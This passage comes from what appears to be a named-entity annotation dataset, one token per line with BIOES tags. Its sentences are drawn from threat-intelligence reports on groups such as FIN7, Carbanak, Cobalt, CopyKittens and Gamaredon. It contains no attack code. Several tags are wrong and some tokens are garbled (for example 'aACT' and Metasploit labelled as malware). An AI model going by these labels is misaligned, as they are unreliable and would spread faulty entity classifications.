+to O
+other O
+Baltic S-LOC
+and O
+Central B-LOC
+Europe E-LOC
+countries O
+, O
+the O
+Middle B-LOC
+East E-LOC
+, O
+Asia S-LOC
+and O
+Africa S-LOC
+. O
+
+FIN7 S-APT
+is O
+a O
+financially-motivated O
+threat O
+group O
+that O
+has O
+been O
+associated O
+with O
+malicious O
+operations O
+dating O
+back O
+to O
+late B-TIME
+2015 E-TIME
+. O
+
+As O
+with O
+previous O
+campaigns S-ACT
+, O
+and O
+as O
+highlighted O
+in O
+our O
+annual O
+M-Trends S-SECTEAM
+2017 S-TIME
+report O
+, O
+FIN7 S-APT
+is O
+calling O
+stores O
+at O
+targeted O
+organizations O
+to O
+ensure O
+they O
+received O
+the O
+email S-ACT
+and O
+attempting O
+to O
+walk O
+them O
+through O
+the O
+infection O
+process O
+. O
+
+We O
+believe O
+that O
+the O
+Carbanak S-MAL
+campaign O
+is O
+a O
+clear O
+indicator O
+of O
+a O
+new O
+era O
+in O
+cybercrime O
+in O
+which O
+criminals S-APT
+use O
+APT B-ACT
+techniques E-ACT
+directly O
+against O
+the O
+financial B-IDTY
+industry E-IDTY
+instead O
+of O
+through O
+its O
+customers S-IDTY
+. O
+
+While O
+FIN7 S-APT
+has O
+embedded O
+VBE S-MAL
+as O
+OLE O
+objects O
+for O
+over O
+a O
+year O
+, O
+they O
+continue O
+to O
+update O
+their O
+script O
+launching O
+mechanisms O
+. O
+
+This O
+report O
+describes O
+the O
+details O
+and O
+type O
+of O
+operations O
+carried O
+out O
+by O
+Carbanak S-MAL
+that O
+focuses O
+on O
+financial B-IDTY
+industry E-IDTY
+, O
+such O
+as O
+payment B-IDTY
+providers E-IDTY
+, O
+retail B-IDTY
+industry E-IDTY
+and O
+PR B-IDTY
+companies E-IDTY
+. O
+
+Carbanak S-MAL
+has O
+its O
+origin O
+in O
+more O
+common O
+financial O
+fraud O
+including O
+theft O
+from O
+consumer S-IDTY
+and O
+corporate O
+bank O
+accounts O
+in O
+Europe S-LOC
+and O
+Russia S-LOC
+, O
+using O
+standard O
+banking O
+malware O
+, O
+mainly O
+Carberp S-MAL
+. O
+
+The O
+group O
+has O
+its O
+origin O
+in O
+more O
+common O
+financial O
+fraud O
+including O
+theft O
+from O
+consumer S-IDTY
+and O
+corporate O
+bank O
+accounts O
+in O
+Europe S-LOC
+and O
+Russia S-LOC
+, O
+using O
+standard O
+banking O
+malware O
+, O
+mainly O
+Carberp S-MAL
+. O
+
+From O
+2013 S-TIME
+Carbanak S-MAL
+intensified O
+its O
+activity O
+focused O
+on O
+banks S-IDTY
+and O
+electronic B-IDTY
+payment E-IDTY
+systems O
+in O
+Russia S-LOC
+and O
+in O
+the O
+post-Soviet S-LOC
+space S-IDTY
+. O
+
+Since O
+2013 S-TIME
+Carbanak S-MAL
+has O
+successfully O
+gained O
+access O
+to O
+networks O
+of O
+more O
+than O
+50 O
+banks S-IDTY
+and O
+5 O
+payment B-IDTY
+systems E-IDTY
+. O
+
+The O
+first O
+successful O
+bank B-ACT
+robbery E-ACT
+was O
+committed O
+by O
+this O
+group O
+in O
+January B-TIME
+2013 E-TIME
+. O
+
+To O
+reduce O
+the O
+risk O
+of O
+losing O
+access O
+to O
+the O
+internal O
+bank O
+network O
+, O
+the O
+Carbanak S-MAL
+, O
+in O
+addition O
+to O
+malicious O
+programs O
+, O
+also O
+used O
+for O
+remote O
+access O
+legitimate O
+programs O
+such O
+as O
+Ammy B-MAL
+Admin E-MAL
+and O
+Team B-MAL
+Viewer E-MAL
+. O
+
+We O
+have O
+no O
+evidence O
+of O
+compromises O
+against O
+banks S-IDTY
+in O
+Western B-LOC
+Europe E-LOC
+or O
+United B-LOC
+States E-LOC
+, O
+but O
+it O
+should O
+be O
+noted O
+that O
+the O
+attackers S-APT
+methods O
+could O
+be O
+utilized O
+against O
+banks S-IDTY
+outside O
+of O
+Russia S-LOC
+as O
+well O
+. O
+
+Additionally O
+the O
+reports O
+on O
+Carbanak S-MAL
+show O
+a O
+different O
+picture O
+, O
+where O
+banks S-IDTY
+targeted O
+outside O
+of O
+Russia S-LOC
+, O
+specifically O
+Europe S-LOC
+, O
+USA S-LOC
+and O
+Japan S-LOC
+are O
+mentioned O
+, O
+which O
+does O
+not O
+match O
+our O
+research O
+. O
+
+Without O
+any O
+insight O
+into O
+the O
+evidence O
+Kaspersky S-SECTEAM
+has O
+obtained O
+, O
+we O
+can O
+only O
+repeat O
+our O
+view O
+that O
+Anunak S-APT
+has O
+targeted O
+only O
+banks S-IDTY
+in O
+Russia S-LOC
+and O
+we O
+have O
+no O
+concrete O
+reports O
+of O
+compromised O
+banks S-IDTY
+outside O
+of O
+Russia S-LOC
+directly O
+related O
+to O
+this O
+criminal O
+group O
+. O
+
+Charming B-APT
+Kitten E-APT
+is O
+an O
+Iranian S-LOC
+cyberespionage S-ACT
+group O
+operating O
+since O
+approximately O
+2014 S-TIME
+. O
+
+These O
+attacks O
+have O
+included O
+criminal B-APT
+groups E-APT
+responsible O
+for O
+the O
+delivery O
+of O
+NewPosThings O
+, O
+MalumPOS O
+and O
+PoSeidon S-APT
+point O
+of O
+sale O
+Malware O
+, O
+as O
+well O
+as O
+Carbanak S-MAL
+from O
+the O
+Russian S-LOC
+criminal B-APT
+organization E-APT
+we O
+track O
+as O
+Carbon B-APT
+Spider E-APT
+. O
+
+The O
+Charming B-APT
+Kitten' E-APT
+focus O
+appears O
+to O
+be O
+individuals O
+of O
+interest O
+to O
+Iran S-LOC
+in O
+the O
+fields O
+of O
+academic B-IDTY
+research E-IDTY
+. O
+
+Sometimes O
+, O
+they O
+aim O
+at O
+establishing O
+a O
+foothold O
+on O
+the O
+target O
+'s O
+computer O
+to O
+gain O
+access O
+into O
+their O
+organization O
+, O
+but O
+, O
+based O
+on O
+our O
+data O
+, O
+this O
+is O
+usually O
+not O
+their O
+main O
+objective O
+, O
+as O
+opposed O
+to O
+other O
+Iranian S-LOC
+threat B-APT
+groups E-APT
+, O
+such O
+as O
+OilRig S-APT
+and O
+CopyKittens S-APT
+. O
+
+Flying B-APT
+Kitten E-APT
+( O
+which O
+is O
+another O
+name O
+given O
+by O
+the O
+security B-IDTY
+industry E-IDTY
+to O
+Charming B-APT
+Kitten E-APT
+) O
+was O
+one O
+of O
+the O
+first O
+groups S-APT
+to O
+be O
+described O
+as O
+a O
+coherent O
+threat O
+actor O
+conducting O
+operations O
+against O
+political O
+opponents O
+of O
+the O
+IRI O
+( O
+Islamic B-LOC
+Republic I-LOC
+of I-LOC
+Iran E-LOC
+) O
+government O
+and O
+foreign O
+espionage S-ACT
+targets O
+. O
+
+Flying B-APT
+Kitten E-APT
+was O
+one O
+of O
+the O
+first O
+groups S-APT
+to O
+be O
+described O
+as O
+a O
+coherent O
+threat O
+actor O
+conducting O
+operations O
+against O
+political O
+opponents O
+of O
+government S-IDTY
+and O
+foreign O
+espionage S-ACT
+targets O
+. O
+
+At O
+certain O
+times O
+, O
+Mesri O
+has O
+been O
+a O
+member O
+of O
+an O
+Iran-based S-LOC
+hacking O
+group O
+called O
+the O
+Turk B-APT
+Black I-APT
+Hat E-APT
+security O
+team O
+" O
+. O
+
+During O
+intense O
+intelligence O
+gathering O
+over O
+the O
+last O
+24 O
+months O
+, O
+we O
+observed O
+the O
+technical O
+capabilities O
+of O
+the O
+Operation B-APT
+Cleaver E-APT
+team O
+rapidly O
+evolve O
+faster O
+than O
+any O
+previously O
+observed O
+Iranian S-LOC
+effort O
+. O
+
+TinyZBot S-MAL
+is O
+a O
+bot O
+written O
+in O
+C# S-TOOL
+and O
+developed O
+by O
+the O
+Cleaver S-APT
+team O
+. O
+
+Some O
+of O
+the O
+teams O
+publicly O
+known O
+today O
+include O
+Iranian S-LOC
+Cyber B-APT
+Army E-APT
+, O
+Ashiyane S-APT
+, O
+Islamic O
+Cyber B-APT
+Resistance I-APT
+Group E-APT
+, O
+Izz B-APT
+ad-Din I-APT
+al-Qassam I-APT
+Cyber I-APT
+Fighters E-APT
+, O
+Parastoo S-APT
+, O
+Shabgard S-APT
+, O
+Iran B-APT
+Black I-APT
+Hats E-APT
+and O
+many O
+others O
+9 O
+. O
+
+However O
+, O
+even O
+though O
+the O
+TTPs O
+of O
+the O
+Cleaver S-APT
+team O
+have O
+some O
+overlap O
+to O
+techniques O
+used O
+by O
+Iranian S-LOC
+Cyber B-APT
+Army E-APT
+, O
+Ashiyane S-APT
+( O
+SQL B-ACT
+injection E-ACT
+) O
+and O
+Syrian B-IDTY
+Electronic I-IDTY
+Army E-IDTY
+( O
+phishing S-ACT
+) O
+, O
+we O
+believe O
+this O
+is O
+largely O
+the O
+work O
+of O
+a O
+new O
+team O
+. O
+
+The O
+Cobalt B-APT
+group E-APT
+'s O
+traditional O
+" O
+stomping O
+grounds O
+" O
+are O
+the O
+Eastern B-LOC
+Europe E-LOC
+, O
+Central B-LOC
+Asia E-LOC
+, O
+and O
+Southeast B-LOC
+Asia E-LOC
+. O
+
+Against O
+targets O
+in O
+the O
+CIS S-LOC
+countries O
+, O
+the O
+Cobalt S-APT
+also O
+used O
+their O
+own O
+infrastructure O
+, O
+which O
+included O
+rented O
+dedicated O
+servers O
+. O
+
+In O
+several O
+cases O
+, O
+the O
+Cobalt S-APT
+compromised O
+company O
+infrastructure O
+and O
+employee O
+accounts O
+in O
+order O
+to O
+send O
+phishing B-ACT
+messages E-ACT
+to O
+partner O
+companies O
+in O
+North S-LOC
+and O
+South B-LOC
+America E-LOC
+, O
+Europe S-LOC
+, O
+CIS S-LOC
+countries O
+, O
+and O
+Central S-LOC
+and O
+Southeast B-LOC
+Asia E-LOC
+. O
+
+To O
+ensure O
+remote B-ACT
+access E-ACT
+to O
+the O
+workstation O
+of O
+an O
+employee O
+at O
+a O
+target O
+organization O
+, O
+the O
+Cobalt B-APT
+group E-APT
+( O
+as O
+in O
+previous O
+years O
+) O
+uses O
+Beacon S-MAL
+, O
+a O
+Trojan S-MAL
+available O
+as O
+part O
+of O
+commercial O
+penetration O
+testing O
+software O
+. O
+
+Artifacts O
+indicated O
+the O
+involvement O
+of O
+the O
+Cobalt S-APT
+that O
+, O
+according O
+to O
+Positive O
+Technologies B-SECTEAM
+information E-SECTEAM
+, O
+from O
+August S-TIME
+to O
+October S-TIME
+had O
+performed O
+similar O
+successful O
+attacks O
+in O
+Eastern B-LOC
+Europe E-LOC
+, O
+and O
+it O
+'s O
+likely O
+that O
+this O
+group O
+may O
+will O
+soon O
+become O
+active O
+in O
+the O
+West O
+. O
+
+In O
+a O
+recent O
+spear-phishing S-ACT
+campaign E-ACT
+, O
+the O
+Cobalt B-APT
+Hacking I-APT
+Group E-APT
+used O
+a O
+remote B-ACT
+code I-ACT
+execution E-ACT
+vulnerability O
+in O
+Microsoft S-IDTY
+Office O
+software O
+to O
+connect O
+to O
+its O
+command O
+and O
+control O
+server O
+via O
+Cobalt B-MAL
+Strike E-MAL
+. O
+
+The O
+basic O
+principles O
+of O
+targeted B-ACT
+attacks E-ACT
+on O
+financial B-IDTY
+institutions E-IDTY
+have O
+not O
+changed O
+since O
+2013 S-TIME
+when O
+the O
+Anunak S-APT
+, O
+Corkow S-MAL
+, O
+Buhtrap S-APT
+, O
+and O
+Lurk B-APT
+groups E-APT
+began O
+conducting O
+the O
+first O
+attacks O
+on O
+Russian S-LOC
+banks S-IDTY
+. O
+
+In O
+a O
+recent O
+spear-phishing S-ACT
+campaign E-ACT
+, O
+the O
+Cobalt B-APT
+Group E-APT
+used O
+a O
+known O
+CVE O
+to O
+connect O
+to O
+its O
+C&C S-TOOL
+server O
+via O
+Cobalt B-MAL
+Strike E-MAL
+, O
+but O
+ended O
+up O
+revealing O
+all O
+targets O
+. O
+
+This O
+isn't O
+the O
+first O
+time O
+we've O
+seen O
+Cobalt S-APT
+makes O
+this O
+error—back O
+in O
+March S-TIME
+, O
+an O
+attack O
+focussing O
+on O
+1,880 O
+targets O
+across O
+financial B-IDTY
+institutions E-IDTY
+in O
+Kazakhstan S-LOC
+had O
+the O
+same O
+flaw O
+. O
+
+The O
+Carbanak B-ACT
+attacks E-ACT
+targeting O
+over O
+a O
+100 O
+financial B-IDTY
+institutions E-IDTY
+worldwide O
+. O
+
+The O
+leader O
+of O
+the O
+crime B-APT
+gang E-APT
+behind O
+the O
+Carbanak S-MAL
+and O
+Cobalt B-ACT
+malware I-ACT
+attacks E-ACT
+targeting O
+over O
+a O
+100 O
+financial B-IDTY
+institutions E-IDTY
+worldwide O
+has O
+been O
+arrested O
+in O
+Alicante O
+, O
+Spain S-LOC
+, O
+after O
+a O
+complex O
+investigation O
+conducted O
+by O
+the O
+Spanish O
+National O
+Police O
+. O
+
+Since O
+2013 S-TIME
+, O
+the O
+Cobalt S-APT
+have O
+attempted O
+to O
+attack O
+banks S-IDTY
+and O
+financial B-IDTY
+institutions E-IDTY
+using O
+pieces O
+of O
+malware O
+they O
+designed O
+. O
+
+Since O
+2013 S-TIME
+, O
+the O
+cybercrime B-APT
+gang E-APT
+have O
+attempted O
+to O
+attack O
+banks S-IDTY
+, O
+e-payment S-IDTY
+systems O
+and O
+financial B-IDTY
+institutions E-IDTY
+using O
+pieces O
+of O
+malware O
+they O
+designed O
+, O
+known O
+as O
+Carbanak S-MAL
+and O
+Cobalt S-MAL
+. O
+
+The O
+organised O
+crime O
+group O
+started O
+its O
+high-tech O
+criminal B-ACT
+activities E-ACT
+in O
+late B-TIME
+2013 E-TIME
+by O
+launching O
+the O
+Anunak B-ACT
+malware I-ACT
+campaign E-ACT
+that O
+targeted O
+financial O
+transfers O
+and O
+ATM O
+networks O
+of O
+financial B-IDTY
+institutions E-IDTY
+around O
+the O
+world O
+. O
+
+One O
+of O
+the O
+Cobalt B-APT
+Group E-APT
+'s O
+latest O
+campaigns S-ACT
+, O
+an O
+attack O
+that O
+leads O
+to O
+a O
+Cobalt S-MAL
+Strike B-MAL
+beacon E-MAL
+and O
+to O
+JavaScript B-MAL
+backdoor E-MAL
+, O
+was O
+investigated O
+and O
+presented O
+by O
+the O
+Talos S-SECTEAM
+research O
+team O
+. O
+
+The O
+Cobalt S-APT
+started O
+its O
+high-tech O
+criminal B-ACT
+activities E-ACT
+in O
+late B-TIME
+2013 E-TIME
+by O
+launching O
+the O
+Anunak B-ACT
+malware I-ACT
+campaign E-ACT
+that O
+targeted O
+financial O
+transfers O
+and O
+ATM O
+networks O
+of O
+financial B-IDTY
+institutions E-IDTY
+around O
+the O
+world O
+. O
+
+The O
+Cobalt B-APT
+group E-APT
+misused O
+Cobalt B-MAL
+Strike E-MAL
+, O
+for O
+instance O
+, O
+to O
+perpetrate O
+ATM O
+cyber B-APT
+heists E-APT
+and O
+target O
+financial B-IDTY
+institutions E-IDTY
+across O
+Europe S-LOC
+, O
+and O
+interestingly O
+, O
+Russia S-LOC
+. O
+
+The O
+hacking O
+group O
+misused O
+Cobalt B-MAL
+Strike E-MAL
+, O
+for O
+instance O
+, O
+to O
+perpetrate O
+ATM O
+cyber B-APT
+heists E-APT
+and O
+target O
+financial B-IDTY
+institutions E-IDTY
+across O
+Europe S-LOC
+, O
+and O
+interestingly O
+, O
+Russia S-LOC
+. O
+
+If O
+successful O
+, O
+Cobalt S-APT
+goes O
+on O
+to O
+attack O
+financial B-IDTY
+institutions E-IDTY
+outside O
+the O
+country O
+. O
+
+The O
+vulnerability O
+was O
+used O
+to O
+retrieve O
+and O
+execute O
+Cobalt B-MAL
+Strike E-MAL
+from O
+a O
+remote O
+server O
+they O
+controlled O
+. O
+
+As O
+part O
+of O
+our O
+monitoring O
+of O
+Iranian B-ACT
+threat I-ACT
+agents I-ACT
+activities E-ACT
+, O
+we O
+have O
+detected O
+that O
+since O
+October B-TIME
+2016 E-TIME
+and O
+until O
+the O
+end B-TIME
+of I-TIME
+January I-TIME
+2017 E-TIME
+, O
+the O
+Jerusalem B-IDTY
+Post E-IDTY
+, O
+as O
+well O
+as O
+multiple O
+other O
+Israeli S-LOC
+websites O
+and O
+one O
+website O
+in O
+the O
+Palestinian B-IDTY
+Authority E-IDTY
+were O
+compromised O
+by O
+Iranian S-LOC
+threat O
+agent O
+CopyKittens S-APT
+. O
+
+CopyKittens S-APT
+use O
+several O
+self-developed O
+malware O
+and O
+hacking O
+tools O
+that O
+have O
+not O
+been O
+publicly O
+reported O
+to O
+date O
+, O
+and O
+are O
+analyzed O
+in O
+this O
+report O
+: O
+TDTESS B-MAL
+backdoor E-MAL
+; O
+Vminst S-MAL
+, O
+a O
+lateral O
+movement O
+tool O
+; O
+NetSrv S-MAL
+, O
+a O
+Cobalt B-MAL
+Strike I-MAL
+loader E-MAL
+; O
+and O
+ZPP S-MAL
+, O
+a O
+files O
+compression O
+console O
+program O
+. O
+
+CopyKittens S-APT
+often O
+uses O
+the O
+trial O
+version O
+of O
+Cobalt B-MAL
+Strike E-MAL
+, O
+a O
+publicly O
+available O
+commercial O
+software O
+for O
+" O
+Adversary O
+Simulations O
+and O
+Red O
+Team O
+Operations O
+" O
+. O
+
+Other O
+public O
+tools O
+used O
+by O
+the O
+CopyKittens S-APT
+are O
+Metasploit S-MAL
+, O
+a O
+well-known O
+free O
+and O
+open O
+source O
+framework O
+for O
+developing O
+and O
+executing O
+exploit S-VULNAME
+code O
+against O
+a O
+remote O
+target O
+machine O
+; O
+Mimikatz S-MAL
+, O
+a O
+post-exploitation O
+tool O
+that O
+performs O
+credential O
+dumping O
+; O
+and O
+Empire S-MAL
+, O
+a O
+PowerShell S-MAL
+and O
+Python S-TOOL
+post-exploitation O
+agent O
+. O
+
+The O
+group O
+, O
+which O
+we O
+have O
+given O
+the O
+name O
+Gallmaker S-APT
+, O
+has O
+been O
+operating O
+since O
+at O
+least O
+December B-TIME
+2017 E-TIME
+, O
+with O
+its O
+most O
+recent O
+activity O
+observed O
+in O
+June B-TIME
+2018 E-TIME
+. O
+
+Rather O
+, O
+the O
+Gallmaker S-APT
+'s O
+attack B-ACT
+activity E-ACT
+we O
+observed O
+is O
+carried O
+out O
+exclusively O
+using O
+LotL S-MAL
+tactics O
+and O
+publicly B-MAL
+available I-MAL
+hack I-MAL
+tools E-MAL
+. O
+
+Gallmaker S-APT
+used O
+lure B-ACT
+documents E-ACT
+attempt O
+to O
+exploit S-VULNAME
+the O
+Microsoft B-TOOL
+Office I-TOOL
+Dynamic I-TOOL
+Data I-TOOL
+Exchange E-TOOL
+( O
+DDE S-TOOL
+) O
+protocol O
+in O
+order O
+to O
+gain O
+access O
+to O
+victim O
+machines O
+. O
+
+Should O
+a O
+user O
+enable O
+this O
+content O
+, O
+the O
+attackers S-APT
+are O
+then O
+able O
+to O
+use O
+the O
+DDE B-MAL
+protocol E-MAL
+to O
+remotely B-ACT
+execute I-ACT
+commands E-ACT
+in O
+memory O
+on O
+the O
+victim O
+'s O
+system O
+. O
+
+Back O
+in O
+2013 S-TIME
+, O
+CopyKittens S-APT
+used O
+several O
+Facebook S-IDTY
+profiles O
+to O
+spread O
+links O
+to O
+a O
+website O
+impersonating O
+Haaretz O
+news O
+, O
+an O
+Israeli S-LOC
+newspaper O
+. O
+
+Gallmaker S-APT
+'s O
+activity O
+appears O
+to O
+be O
+highly O
+targeted O
+, O
+with O
+its O
+victims O
+all O
+related O
+to O
+government S-IDTY
+, O
+military S-IDTY
+, O
+or O
+defense B-IDTY
+sectors E-IDTY
+. O
+
+Gallmaker S-APT
+'s O
+targets O
+are O
+embassies S-IDTY
+of O
+an O
+Eastern B-LOC
+European E-LOC
+country O
+. O
+
+There O
+are O
+no O
+obvious O
+links O
+between O
+the O
+Eastern B-LOC
+European E-LOC
+and O
+Middle B-LOC
+Eastern E-LOC
+targets O
+, O
+but O
+it O
+is O
+clear O
+that O
+Gallmaker S-APT
+is O
+specifically O
+targeting O
+the O
+defense S-IDTY
+, O
+military S-IDTY
+, O
+and O
+government B-IDTY
+sectors E-IDTY
+. O
+
+The O
+group O
+has O
+carried O
+out O
+attacks O
+most O
+months O
+since O
+December B-TIME
+2017 E-TIME
+. O
+
+Its O
+activity O
+subsequently O
+increased O
+in O
+the B-TIME
+second I-TIME
+quarter I-TIME
+of I-TIME
+2018 E-TIME
+, O
+with O
+a O
+particular O
+spike O
+in O
+April B-TIME
+2018 E-TIME
+. O
+
+The O
+fact O
+that O
+Gallmaker S-APT
+appears O
+to O
+rely O
+exclusively O
+on O
+LotL S-MAL
+tactics O
+and O
+publicly B-MAL
+available I-MAL
+hack I-MAL
+tools E-MAL
+makes O
+its O
+activities S-ACT
+extremely O
+hard O
+to O
+detect O
+. O
+
+The O
+Gamaredon B-APT
+Group E-APT
+primarily O
+makes O
+use O
+of O
+compromised O
+domains O
+, O
+dynamic B-IDTY
+DNS I-IDTY
+providers E-IDTY
+, O
+Russian S-LOC
+and O
+Ukrainian S-LOC
+country O
+code O
+top-level O
+domains O
+( O
+ccTLDs O
+) O
+, O
+and O
+Russian S-LOC
+hosting B-IDTY
+providers E-IDTY
+to O
+distribute O
+their O
+custom-built S-MAL
+malware S-MAL
+. O
+
+Gallmaker S-APT
+may O
+well O
+have O
+continued O
+to O
+avoid O
+detection O
+were O
+it O
+not O
+for O
+Symantec S-SECTEAM
+'s O
+technology O
+. O
+
+In O
+this O
+instance O
+, O
+Symantec S-SECTEAM
+identified O
+the O
+specific O
+PowerShell B-MAL
+commands E-MAL
+used O
+by O
+Gallmaker S-APT
+as O
+being O
+suspicious O
+, O
+leading O
+to O
+the O
+discovery O
+of O
+this O
+new O
+campaign O
+. O
+
+Without O
+Symantec S-SECTEAM
+'s O
+advanced O
+AI-based O
+capabilities O
+, O
+Gallmaker S-APT
+'s O
+activities S-ACT
+may O
+well O
+have O
+remained O
+undetected O
+. O
+
+Previously O
+, O
+LookingGlass S-SECTEAM
+reported O
+on O
+a O
+campaign O
+they O
+named O
+" O
+Operation B-ACT
+Armageddon E-ACT
+" O
+, O
+targeting O
+individuals O
+involved O
+in O
+the O
+Ukrainian S-LOC
+military S-IDTY
+and O
+national O
+security O
+establishment O
+. O
+
+The O
+earliest O
+discovered O
+sample O
+( O
+based O
+on O
+compile O
+times O
+and O
+sandbox O
+submission O
+times O
+) O
+distributed O
+by O
+this O
+threat O
+group O
+resembles O
+the O
+descriptions O
+of O
+Gamaredon S-APT
+provided O
+by O
+Symantec S-SECTEAM
+and O
+Trend B-SECTEAM
+Micro E-SECTEAM
+. O
+
+The O
+scripts O
+would O
+also O
+use O
+wget S-MAL
+to O
+send O
+POST O
+requests O
+to O
+command O
+and O
+control O
+( O
+C2 S-TOOL
+) O
+servers O
+that O
+would O
+contain O
+information O
+about O
+the O
+compromised O
+system O
+. O
+
+These O
+VNC S-MAL
+exectuables O
+would O
+either O
+be O
+included O
+in O
+the O
+SFX B-ACT
+file E-ACT
+or O
+downloaded O
+by O
+the O
+batch B-ACT
+script E-ACT
+. O
+
+The O
+batch O
+script O
+would O
+then O
+attempt O
+to O
+have O
+the O
+VNC S-MAL
+program O
+connect O
+to O
+a O
+command O
+and O
+control O
+( O
+C2 S-TOOL
+) O
+server O
+to O
+enable O
+the O
+server O
+to O
+control O
+the O
+compromised O
+system O
+. O
+
+While O
+the O
+most O
+recent O
+samples O
+observed O
+still O
+use O
+batch B-MAL
+scripts E-MAL
+and O
+SFX B-MAL
+files E-MAL
+, O
+the O
+Gamaredon B-APT
+Group E-APT
+has O
+moved O
+aACT O
+from O
+applications O
+like O
+wget S-MAL
+, O
+Remote B-MAL
+Manipulator I-MAL
+MAL E-MAL
+, O
+VNC S-MAL
+and O
+ChkFlsh.exe S-MAL
+. O
+
+The O
+threat O
+group O
+using O
+these O
+implants O
+has O
+been O
+active O
+since O
+at O
+least O
+2014 S-TIME
+and O
+has O
+been O
+seen O
+targeting O
+individuals O
+likely O
+involved O
+in O
+the O
+Ukrainian S-LOC
+government S-IDTY
+. O
+
+Some O
+of O
+the O
+samples O
+share O
+delivery O
+mechanisms O
+and O
+infrastructure O
+with O
+samples O
+which O
+are O
+detected O
+by O
+a O
+few O
+antivirus O
+vendors O
+as O
+Gamaredon S-APT
+. O
+
+Periodically O
+, O
+researchers O
+at O
+Palo B-SECTEAM
+Alto I-SECTEAM
+Networks E-SECTEAM
+hunt O
+through O
+WildFire S-SECTEAM
+execution O
+reports O
+, O
+using O
+AutoFocus O
+, O
+to O
+identify O
+untagged O
+samples O
+' O
+artifacts O
+in O
+the O
+hopes O
+of O
+identifying O
+previously O
+undiscovered O
+malware O
+families O
+, O
+behaviors O
+, O
+and O
+campaigns S-ACT
+. O
+
+Just O
+a O
+few O
+months O
+later O
+, O
+in O
+February B-TIME
+2015 E-TIME
+, O
+we O
+announced O
+the O
+discovery O
+of O
+Carbanak S-MAL
+, O
+a O
+cyber-criminal B-APT
+gang E-APT
+that O
+used O
+custom O
+malware O
+and O
+APT B-ACT
+techniques E-ACT
+to O
+steal O
+millions O
+of O
+dollars O
+while O
+infecting O
+hundreds O
+of O
+financial B-IDTY
+institutions E-IDTY
+in O
+at O
+least O
+30 O
+countries O
+. O
+
+Today O
+at O
+the O
+Security B-IDTY
+Analyst I-IDTY
+Summit E-IDTY
+( O
+SAS S-IDTY
+2016 O
+) O
+, O
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+is O
+announcing O
+the O
+discovery O
+of O
+two O
+new O
+gangs O
+engaged O
+in O
+APT-style O
+bank S-IDTY
+robberies O
+– O
+Metel S-APT
+and O
+GCMAN S-APT
+– O
+and O
+the O
+reemergence O
+of O
+the O
+Carbanak B-APT
+group E-APT
+with O
+new O
+targets O
+in O
+its O
+sights O
+. O
+
+In O
+2015 S-TIME
+, O
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+researchers O
+conducted O
+Incident O
+Response O
+for O
+29 O
+organizations O
+located O
+in O
+Russia S-LOC
+and O
+infected O
+by O
+these O
+three O
+groups S-APT
+. O
+
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+is O
+releasing O
+crucial O
+Indicators O
+of O
+Compromise O
+( O
+IOCs O
+) O
+and O
+other O
+data O
+to O
+help O
+organizations O
+search O
+for O
+traces O
+of O
+these O
+attack B-APT
+groups E-APT
+in O
+their O
+corporate O
+networks O
+. O
+
+In O
+all O
+, O
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+discovered O
+Metel S-APT
+in O
+more O
+than O
+30 O
+financial B-IDTY
+institutions E-IDTY
+. O
+
+It O
+is O
+highly O
+likely O
+that O
+this O
+threat O
+is O
+far O
+more O
+widespread O
+and O
+we O
+urge O
+financial B-IDTY
+institutions E-IDTY
+around O
+the O
+world O
+to O
+scan O
+their O
+networks O
+for O
+signs O
+of O
+the O
+Metel S-MAL
+malware S-MAL
+. O
+
+A O
+second O
+group O
+, O
+which O
+we O
+call O
+GCMAN S-APT
+because O
+the O
+malware O
+is O
+based O
+on O
+code O
+compiled O
+on O
+the O
+GCC O
+compiler O
+, O
+emerged O
+recently O
+using O
+similar O
+techniques O
+to O
+the O
+Metel B-APT
+Group E-APT
+to O
+infect O
+banking B-IDTY
+institutions E-IDTY
+and O
+attempt O
+to O
+transfer O
+money O
+to O
+e-currency O
+services O
+. O
+
+Our O
+investigations O
+revealed O
+that O
+the O
+attackers S-APT
+drove O
+around O
+several O
+cities O
+in O
+Russia S-LOC
+, O
+stealing O
+money O
+from O
+ATMs O
+belonging O
+to O
+different O
+banks S-IDTY
+. O
+
+Once O
+inside O
+the O
+network O
+, O
+the O
+GCMAN B-APT
+group E-APT
+uses O
+legitimate O
+and O
+penetration O
+testing O
+tools O
+such O
+as O
+Putty S-MAL
+, O
+VNC S-MAL
+, O
+and O
+Meterpreter S-MAL
+for O
+lateral O
+movement O
+. O
+
+Our O
+investigation O
+revealed O
+an O
+attack O
+where O
+the O
+GCMAN B-APT
+group E-APT
+then O
+planted O
+a O
+cron B-ACT
+script E-ACT
+into O
+bank S-IDTY
+'s O
+server O
+, O
+sending O
+financial O
+transactions O
+at O
+the O
+rate O
+of O
+$200 O
+per O
+minute O
+. O
+
+The O
+GCMAN B-APT
+group E-APT
+used O
+an O
+MS B-ACT
+SQL I-ACT
+injection E-ACT
+in O
+commercial O
+software O
+running O
+on O
+one O
+of O
+bank S-IDTY
+'s O
+public O
+web O
+services O
+, O
+and O
+about O
+a O
+year O
+and O
+a O
+half O
+later O
+, O
+they O
+came O
+back O
+to O
+cash O
+out O
+. O
+
+During O
+that O
+time O
+they O
+poked O
+70 O
+internal O
+hosts O
+, O
+compromised O
+56 O
+accounts O
+, O
+making O
+their O
+ACT O
+from O
+139 O
+attack O
+sources O
+( O
+TOR O
+and O
+compromised O
+home O
+routers O
+) O
+. O
+
+However O
+, O
+in O
+September S-TIME
+last O
+year O
+, O
+our O
+friends O
+at O
+CSIS S-SECTEAM
+published O
+a O
+blog O
+detailing O
+a O
+new O
+Carbanak S-MAL
+variant O
+affecting O
+one O
+of O
+its O
+customers S-IDTY
+. O
+
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+'s O
+research O
+team O
+responded O
+to O
+three O
+financial B-IDTY
+institutions E-IDTY
+in O
+Russia S-LOC
+that O
+were O
+infected O
+with O
+the O
+GCMAN S-MAL
+malware S-MAL
+. O
+
+In O
+one O
+remarkable O
+case O
+, O
+the O
+Carbanak S-MAL
+2.0 O
+gang O
+used O
+its O
+access O
+to O
+a O
+financial B-IDTY
+institution E-IDTY
+that O
+stores O
+information O
+about O
+shareholders O
+to O
+change O
+the O
+ownership O
+details O
+of O
+a O
+large O
+company O
+. O
+
+Recently O
+Subaat S-APT
+drew O
+our O
+attention O
+due O
+to O
+renewed O
+targeted B-ACT
+attack I-ACT
+activity E-ACT
+. O
+
+Technical O
+analysis O
+on O
+some O
+of O
+the O
+attacks O
+as O
+well O
+as O
+attribution O
+links O
+with O
+Pakistan S-LOC
